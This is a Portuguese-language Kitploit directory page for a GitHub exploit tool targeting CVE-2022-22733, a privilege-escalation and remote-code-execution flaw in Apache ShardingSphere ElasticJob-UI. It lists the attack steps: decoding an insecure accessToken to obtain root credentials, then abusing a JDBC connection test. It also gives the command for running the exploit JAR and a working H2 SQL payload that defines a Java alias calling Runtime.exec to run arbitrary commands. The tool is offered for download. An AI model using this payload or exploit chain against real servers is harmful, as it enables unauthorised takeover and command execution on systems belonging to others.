Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22733 — Apache ShardingSphere ElasticJob-UI Escalação de Privilégios & Exploit de RCE | Kitploit
Ferramentas/GitHubGitHub/zeyad-azima/cve-2022-22733
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubzeyad-azima/cve-2022-22733

CVE-2022-22733

Apache ShardingSphere ElasticJob-UI Escalação de Privilégios & Exploit de RCE

Ver Repositório
21há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-22733

CVE-2022-22733 é uma vulnerabilidade que afeta o Apache ShardingSphere ElasticJob-UI 3.0.0 e versões anteriores. A vulnerabilidade leva à Escalação de Privilégios. Porém, abusando dos privilégios escalados, um ataque JDBC pode ser executado e alcançar RCE. Você pode ler a análise da vulnerabilidade Aqui e o blog de escrita do exploit passo a passo Aqui.

elasticjob

O Exploit funciona da seguinte forma:

  • Faça login com a conta de baixo privilégio.
  • Obtenha o accessToken gerado de forma insegura.
  • Decodifique o accessToken gerado de forma insegura.
  • Analise os dados decodificados do accessToken.
  • Recupere as credenciais da conta root dos dados analisados.
  • Faça login com as credenciais da conta root e obtenha privilégios totais na aplicação.
  • Envie uma solicitação de Teste de Conexão abusando do ataque ``JDBC`.

Usage

Você pode baixar o arquivo JAR aqui e o código fonte aqui.

  • Execute o jar:
root@kitploit:~
java -jar CVE-2022-22733.jar
  • Código do script SQL:
root@kitploit:~
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')

Demo

idea64_5Ru1DeWcKE

Baixar ferramenta